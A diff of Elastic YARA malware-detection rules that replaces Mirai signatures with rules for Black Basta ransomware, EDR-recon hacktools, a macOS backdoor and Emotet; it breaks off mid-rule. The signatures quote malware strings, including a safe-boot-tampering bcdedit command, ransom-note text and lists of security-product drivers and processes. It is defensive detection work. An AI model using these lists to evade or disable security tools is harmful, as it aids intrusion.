+77470,1084 @@ rule ELASTIC_Linux_Trojan_Mirai_Fa3Ad9D0 : FILE MEMORY os = "linux" strings: - $a = { CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 } + $pp = "prepare_pipe" + $s1 = "splice failed" + $s2 = "short splice" + $s3 = "short write" + $s4 = "hijacking suid binary" + $s5 = "Usage: %s TARGETFILE OFFSET DATA" + $s6 = "Usage: %s SUID" + $bs1 = { B8 00 10 00 00 81 7D EC 00 10 00 00 0F 46 45 EC 89 45 FC 8B 55 FC 48 8B 45 D8 48 83 C0 04 8B 00 48 8D 35 } + $bs2 = { B8 00 10 00 00 81 7D F0 00 10 00 00 0F 46 45 F0 89 45 F8 8B 55 F8 48 8B 45 D8 8B 00 48 } condition: - all of them + ($pp and 2 of ($s*)) or ( all of ($bs*)) } -rule ELASTIC_Linux_Trojan_Mirai_0Cb1699C : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Blackbasta_494D3C54 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Ransomware Blackbasta (Windows.Ransomware.BlackBasta)" author = "Elastic Security" - id = "0cb1699c-9a08-4885-aa7f-0f1ee2543cac" - date = "2021-01-12" - modified = "2021-09-16" + id = "494d3c54-4690-4334-b64d-ebeeb305de0e" + date = "2022-08-06" + modified = "2022-08-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L80-L98" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb" - logic_hash = "97307f583240290de2bfc663b99f8dcdedace92885bd3e0c0340709b94c0bc2a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_BlackBasta.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "357fe8c56e246ffacd54d12f4deb9f1adb25cb772b5cd2436246da3f2d01c222" + logic_hash = "1ecb3c95a2d3f91d267f0b625fffc8477612fde9de3942eff8eb13115c0af6b8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6e44c68bba8c9fb53ac85080b9ad765579f027cabfea5055a0bb3a85b8671089" + fingerprint = "27602cb05c054a1aa9e27b91675d57707f4a63fa91badc83ad86229839778f4e" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 10 0F B7 02 83 E9 02 83 } + $a1 = "Done time: %.4f seconds, encrypted: %.4f gb" ascii fullword + $a2 = "Creating readme at %s" wide fullword + $a3 = "All of your files are currently encrypted by no_name_software." ascii fullword + $a4 = "DON'T move or rename your files. These parameters can be used for encryption/decryption process." ascii fullword + $b1 = "Your data are stolen and encrypted" ascii fullword + $b2 = "bcdedit /deletevalue safeboot" ascii fullword + $b3 = "Your company id for log in:" + $byte_seq = { 0F AF 45 DC 8B CB 0F AF 4D DC 0F AF 5D D8 0F AF 55 D8 8B F9 } + $byte_seq2 = { 18 FF 24 1E 18 FF 64 61 5D FF CF CF CF FF D0 D0 D0 FF D0 D0 D0 FF } condition: - all of them + 4 of them } -rule ELASTIC_Linux_Trojan_Mirai_6F021787 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Edrrecon_69453Aff : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Hacktool Edrrecon (Windows.Hacktool.EDRrecon)" author = "Elastic Security" - id = "6f021787-9c2d-4536-bd90-5230c85a8718" - date = "2021-01-12" - modified = "2021-09-16" + id = "69453aff-1427-4aae-b1f3-7cce9c93342c" + date = "2024-03-07" + modified = "2024-06-10" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L100-L118" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "88183d71359c16d91a3252085ad5a270ad3e196fe431e3019b0810ecfd85ae10" - logic_hash = "7e8062682a0babbaa3c00975807ba9fc34c465afde55e4144944e7598f0ea1fd" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_EDRrecon.yar#L1-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f62e51b2405c0d42c53ff1f560376ef0530ba2eea1c97e18f2a3cf148346bcd1" + logic_hash = "3d0f6dc5d47a3c0957a7aa8d2918fee113d079d7d74f37a1c17c5429034ba41f" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "33ba39b77e55b1a2624e7846e06b2a820de9a8a581a7eec57e35b3a1636b8b0d" + fingerprint = "f10758ed032a0f7da0d983839beb12f79fba764aa4ffa0f3716dbfc2e8a3ea82" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 55 D4 66 89 14 01 0F B6 45 D0 48 63 D0 48 89 D0 48 01 C0 48 } + $s01 = "WdFilter.sys" ascii wide fullword + $s02 = "mpFilter.sys" ascii wide fullword + $s03 = "SRTSP.sys" ascii wide fullword + $s04 = "eeCtrl.sys" ascii wide fullword + $s05 = "360AvFlt.sys" ascii wide fullword + $s06 = "360fsflt.sys" ascii wide fullword + $s07 = "esensor.sys" ascii wide fullword + $s09 = "klflt.sys" ascii wide fullword + $s10 = "klam.sys" ascii wide fullword + $s11 = "SysmonDrv.sys" ascii wide fullword + $s12 = "CarbonBlackK.sys" ascii wide fullword + $s13 = "edrsensor.sys" ascii wide fullword + $s14 = "naswSP.sys" ascii wide fullword + $s15 = "symevnt.sys" ascii wide fullword + $s16 = "symevnt32.sys" ascii wide fullword + $s17 = "CyProtectDrv" ascii wide fullword + $s18 = "mfeaskm.sys" ascii wide fullword + $s19 = "SentinelMonitor.sys" ascii wide fullword + $s20 = "sentinelelam.sys" ascii wide fullword + $s21 = "SophosSupport.sys" ascii wide fullword + $s22 = "CSDeviceControl.sys" ascii wide fullword + $s23 = "csagent.sys" ascii wide fullword + $s24 = "avgntflt.sys" ascii wide fullword + $s25 = "bddevflt.sys" ascii wide fullword + $s26 = "CiscoAMPHeurDriver.sys" ascii wide fullword + $s27 = "DeepInsFS.sys" ascii wide fullword + $s28 = "eamonm.sys" ascii wide fullword + $s29 = "fortirmon.sys" ascii wide fullword + $s30 = "FlightRecorder.sys" ascii wide fullword + $s31 = "TmKmSnsr.sys" ascii wide fullword + $s32 = "cpepmon.sys" ascii wide fullword + $s33 = "cposfw.sys" ascii wide fullword + $s34 = "cyvrmtgn.sys" ascii wide fullword + $s35 = "elastic-endpoint-driver.sys" ascii wide fullword + $s36 = "elasticelam.sys" ascii wide fullword + $37 = "mbamwatchdog.sys" ascii wide fullword + $38 = "FortiEDRWinDriver" ascii wide fullword + $39 = "QaxNfDrv.sys" ascii wide fullword + $40 = "qmnetmonw64.sys" ascii wide fullword + $s41 = "TFsFlt.sys" ascii wide fullword + $s42 = "DsArk64.sys" ascii wide fullword condition: - all of them + 14 of them } -rule ELASTIC_Linux_Trojan_Mirai_1E0C5Ce0 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Edrrecon_Ca314Aa1 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Hacktool Edrrecon (Windows.Hacktool.EDRrecon)" author = "Elastic Security" - id = "1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79" - date = "2021-01-12" - modified = "2021-09-16" + id = "ca314aa1-3bbe-489c-a77a-fb7a0eca1f67" + date = "2024-03-07" + modified = "2024-06-10" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L120-L138" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d" - logic_hash = "591cc3ef6932bf990f56c932866b34778e8eccd0e343f9bd6126eb8205a12ecc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_EDRrecon.yar#L61-L115" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f62e51b2405c0d42c53ff1f560376ef0530ba2eea1c97e18f2a3cf148346bcd1" + logic_hash = "04b8681b0b6f8fa51eb90488edf35638da3334886c7db5fc22218712b0d23007" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b" + fingerprint = "58c6c2cbb92262098af27f8434863d1ea91c31f02727c5dde72d6ac07b3b872d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 4C 24 54 31 F6 41 B8 04 00 00 00 BA 03 00 00 00 C7 44 24 54 01 00 } + $s01 = "SentinelAgent.exe" ascii wide fullword + $s02 = "SentinelUI.exe" ascii wide fullword + $s03 = "MsMpEng.exe" ascii wide fullword + $s04 = "SenseIR.exe" ascii wide fullword + $s05 = "elastic-endpoint.exe" ascii wide fullword + $s06 = "elastic-agent.exe" ascii wide fullword + $s07 = "CylanceSvc.exe" ascii wide fullword + $s09 = "CybereasonAV.exe" ascii wide fullword + $s10 = "Traps.exe" ascii wide fullword + $s11 = "CyvrFsFlt.exe" ascii wide fullword + $s12 = "EIConnector.exe" ascii wide fullword + $s13 = "ekrn.exe" ascii wide fullword + $s14 = "fortiedr.exe" ascii wide fullword + $s15 = "RepMgr.exe" ascii wide fullword + $s16 = "TaniumDetectEngine.exe" ascii wide fullword + $s17 = "CSFalconService.exe" ascii wide fullword + $s18 = "CSFalconContainer.exe" ascii wide fullword + $s19 = "EndpointBasecamp.exe" ascii wide fullword + $s20 = "hmpalert.exe" ascii wide fullword + $s21 = "xagt.exe" ascii wide fullword + $s22 = "TMBMSRV.exe" ascii wide fullword + $s23 = "EIConnector.exe" ascii wide fullword + $s25 = "mcsclient.exe" ascii wide fullword + $s26 = "sophososquery.exe" ascii wide fullword + $s27 = "TaniumClient.exe" ascii wide fullword + $s28 = "asdsvc.exe" ascii wide fullword + $s29 = "avp.exe" ascii wide fullword + $s30 = "avpui.exe" ascii wide fullword + $s31 = "mbae-svc.exe" ascii wide fullword + $s32 = "mbae.exe" ascii wide fullword + $s33 = "ccSvcHst.exe" ascii wide fullword + $s35 = "bdagent.exe" ascii wide fullword + $s36 = "ir_agent.exe" ascii wide fullword + $s37 = "eguiproxy.exe" ascii wide fullword + $s38 = "ekrn.exe" ascii wide fullword + $s39 = "Sysmon64.exe" ascii wide fullword + $s40 = "Sysmon.exe" ascii wide fullword condition: - all of them + 14 of them } -rule ELASTIC_Linux_Trojan_Mirai_22965A6D : FILE MEMORY +rule ELASTIC_Macos_Backdoor_Useragent_1A02Fc3A : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Macos Backdoor Useragent (MacOS.Backdoor.Useragent)" author = "Elastic Security" - id = "22965a6d-85d3-4f7c-be4a-581044581b77" - date = "2021-01-12" - modified = "2021-09-16" + id = "1a02fc3a-a394-457b-8af5-99f7f22b0a3b" + date = "2021-11-11" + modified = "2022-07-22" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L140-L158" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "09c821aa8977f67878f8769f717c792d69436a951bb5ac06ce5052f46da80a48" - logic_hash = "6b2a46694edf709d28267268252cfe95d88049b7dca854059cfe44479ada7423" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Backdoor_Useragent.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "623f99cbe20af8b79cbfea7f485d47d3462d927153d24cac4745d7043c15619a" + logic_hash = "90debdfc24ef100952302808a2e418bca2a46be3e505add9a0ccf4c49aff5102" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a34bcba23cde4a2a49ef8192fa2283ce03c75b2d1d08f1fea477932d4b9f5135" + fingerprint = "22afa14a3dc6f8053b93bf3e971d57808a9cc19e676f9ed358ba5f1db9292ba4" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { E6 4A 64 2B E4 82 D1 E3 F6 5E 88 34 DA 36 30 CE 4E 83 EC F1 } + $s1 = "/Library/LaunchAgents/com.UserAgent.va.plist" + $s2 = "this is not root" + $s3 = "rm -Rf " + $s4 = "/start.sh" + $s5 = ".killchecker_" condition: - all of them + 4 of them } -rule ELASTIC_Linux_Trojan_Mirai_4032Ade1 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Emotet_18379A8D : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" author = "Elastic Security" - id = "4032ade1-4864-4637-ae73-867cd5fb7378" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L160-L178" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6150fbbefb916583a0e888dee8ed3df8ec197ba7c04f89fb24f31de50226e688" - logic_hash = "9c5e24c4efd4035408897f638d3579c3798139fd18178cee4a944b49c13e1532" + id = "18379a8d-f1f2-49cc-8edf-58a3ba77efe7" + date = "2021-11-17" + modified = "2022-01-13" + reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Emotet.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827" + logic_hash = "2ad72ce2a352b91a4fa597ee9e796035298cfcee6fdc13dd3f64579d8da96b97" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2b150a6571f5a2475d0b4a2ddb75623d6fa1c861f5385a5c42af24db77573480" + fingerprint = "b7650b902a1a02029e28c88dd7ff91d841136005b0246ef4a08aaf70e57df9cc" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { F8 0C 67 56 55 4C 06 87 DE B2 C0 79 AE 88 73 79 0C 7E F8 87 } + $a = { 04 33 CB 88 0A 8B C1 C1 E8 08 8D 52 04 C1 E9 10 88 42 FD 88 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_B14F4C5D : FILE MEMORY +rule ELASTIC_Windows_Trojan_Emotet_5528B3B0 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" author = "Elastic Security" - id = "b14f4c5d-054f-46e6-9fa8-3588f1ef68b7" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L180-L197" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "1a2114a7b397c850d732940a0e154bc04fbee1fdc12d343947b343b9b27a8af1" + id = "5528b3b0-d4cb-485e-bc0c-96415ec3a795" + date = "2021-11-17" + modified = "2022-01-13" + reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Emotet.yar#L22-L41" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827" + logic_hash = "bb784ab0e064bafa8450b6bb15ef534af38254ea3c096807571c2c27f7cdfd76" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817" + fingerprint = "717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3 } + $a = { 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_C8385B81 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Emotet_1943Bbf2 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" author = "Elastic Security" - id = "c8385b81-0f5b-41c3-94bb-265ede946a84" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L199-L217" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3d27736caccdd3199a14ce29d91b1812d1d597a4fa8472698e6df6ef716f5ce9" - logic_hash = "4ff1f0912fb92e7ac5af49e1738dac897ff1f0a118d8ff905da45b0a91b3f4a7" + id = "1943bbf2-56c0-443e-9208-cd8fc3b02d79" + date = "2021-11-18" + modified = "2022-01-13" + reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Emotet.yar#L43-L62" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5abec3cd6aa066b1ddc0149a911645049ea1da66b656c563f9a384e821c5db38" + logic_hash = "41838e335b9314b8759922f23ec8709f46e6a26633f3685ac98ada5828191d35" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dfdbd4dbfe16bcf779adb16352d5e57e3950e449e96c10bf33a91efee7c085e5" + fingerprint = "df8b73d83a50a58ed8332b7580c970c2994aa31d2ac1756cff8e0cd1777fb8fa" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 8D 74 26 00 89 C2 83 ED 04 C1 E2 0B 31 C2 89 F0 C1 E8 13 89 D1 } + $a = { 66 83 38 5C 74 0A 83 C0 02 66 39 30 75 F2 EB 06 33 C9 66 89 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_122Ff2E6 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Emotet_Db7D33Fa : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" author = "Elastic Security" - id = "122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L219-L237" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4" - logic_hash = "62884309b9095cdd6219c9ef6cd77a0f712640d8a1db4afe5b1d01f4bbe5acc2" + id = "db7d33fa-e50c-4c59-ab92-edb74aac87c9" + date = "2022-05-09" + modified = "2022-06-09" + reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Emotet.yar#L64-L90" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc" + logic_hash = "e220c112c15f384fde6fc2286b01c7eb9bedcf4817d02645d0fa7afb05e7b593" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348" + fingerprint = "eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 24 EB 15 89 F0 83 C8 01 EB 03 8B 5B 08 3B 43 04 72 F8 8B 4B 0C 89 } + $chunk_0 = { 4C 8D 9C 24 ?? ?? ?? ?? 8B C3 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B E3 5D C3 } + $chunk_1 = { 8B C7 41 0F B7 4C 45 ?? 41 8B 1C 8C 48 03 DD 48 3B DE 72 ?? } + $chunk_2 = { 48 8B C4 48 89 48 ?? 48 89 50 ?? 4C 89 40 ?? 4C 89 48 ?? C3 } + $chunk_3 = { 48 8B 45 ?? BB 01 00 00 00 48 89 07 8B 45 ?? 89 47 ?? 4C 8D 9C 24 ?? ?? ?? ?? 8B C3 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B E3 5D C3 } + $chunk_4 = { 48 39 3B 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 40 0F 95 C7 8B C7 49 8B 7B ?? 49 8B E3 5D C3 } + $chunk_5 = { BE 02 00 00 00 4C 8D 9C 24 ?? ?? ?? ?? 8B C6 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B E3 41 5F 41 5E 41 5D 41 5C 5D C3 } + $chunk_6 = { 43 8B 84 FE ?? ?? ?? ?? 48 03 C6 48 3B D8 73 ?? } + $chunk_7 = { 88 02 48 FF C2 48 FF C3 8A 03 84 C0 75 ?? EB ?? } condition: - all of them + 4 of them } -rule ELASTIC_Linux_Trojan_Mirai_26Cba88C : FILE MEMORY +rule ELASTIC_Windows_Trojan_Emotet_D6Ac1Ea4 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" author = "Elastic Security" - id = "26cba88c-7bd4-4fac-b395-04c4745fee43" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L239-L257" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4b4758bff3dcaa5640e340d27abba5c2e2b02c3c4a582374e183986375e49be8" - logic_hash = "bb5a0f9e68655556ab9fccc27d11bf7828c299720bb67948455579d6a7eb2a9f" + id = "d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3" + date = "2022-05-24" + modified = "2022-06-09" + reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Emotet.yar#L92-L114" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71" + logic_hash = "9b37940ea8752c6db52d4f09225de0389438c41468a11a7cda8f28b191192ef9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "358dd5d916fec3e1407c490ce0289886985be8fabee49581afbc01dcf941733e" + fingerprint = "7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { F6 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4A 00 } + $calc1 = { C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? } + $pre = { 48 83 EC ( 18 | 28 ) C7 44 24 ?? ?? ?? ?? ?? } + $setup = { 48 8D 05 ?? ?? ?? ?? 48 89 81 ?? ?? ?? ?? } + $post = { 8B 44 24 ?? 89 44 24 ?? 48 83 C4 18 C3 } condition: - all of them + #calc1>=10 and #pre>=5 and #setup>=5 and #post>=5 } -rule ELASTIC_Linux_Trojan_Mirai_93Fc3657 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Emotet_77C667B9 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" author = "Elastic Security" - id = "93fc3657-fd21-4e93-a728-c084fc0a6a4a" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L259-L277" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6" - logic_hash = "0b5278feddd00b0b24ca735bf7cd1440379c6ce5aca6d2a6f38c9fdcedcb3c0d" + id = "77c667b9-6895-428f-8735-ba5853d9484d" + date = "2022-11-07" + modified = "2022-12-20" + reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Emotet.yar#L116-L144" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ffac0120c3ae022b807559e8ed7902fde0fa5f7cb9c5c8d612754fa498288572" + logic_hash = "f11769fe5e9789b451e8826c5fd22bde5b3eb9f7af1d5fec7eec71700fc1f482" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee" + fingerprint = "f8fac966f77cd8d6654b8abffbf63d884bd9f0b5d51bfc252004a0d9bd569068" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C } + $c2_list_1 = { 8B 4B ?? 8B 85 ?? ?? ?? ?? 48 FF C1 48 C1 E1 ?? 89 04 19 8B 43 ?? 8B 8D ?? ?? ?? ?? 48 C1 E0 ?? C1 E9 ?? 66 89 4C 18 ?? } + $c2_list_2 = { 8B 43 ?? 48 8D 0C 80 8B 44 24 ?? 89 44 CB ?? 8B 43 ?? 8B 54 24 ?? 48 8D 0C 80 C1 EA ?? 66 89 54 CB ?? 8B 43 ?? 0F B7 54 24 ?? 48 8D 0C 80 89 54 CB ?? FF 43 ?? } + $c2_list_3 = { 8B 43 ?? 48 FF C0 48 8D 0C 40 8B 85 ?? ?? ?? ?? 48 03 C9 89 04 CB 8B 43 ?? 8B 95 ?? ?? ?? ?? 48 8D 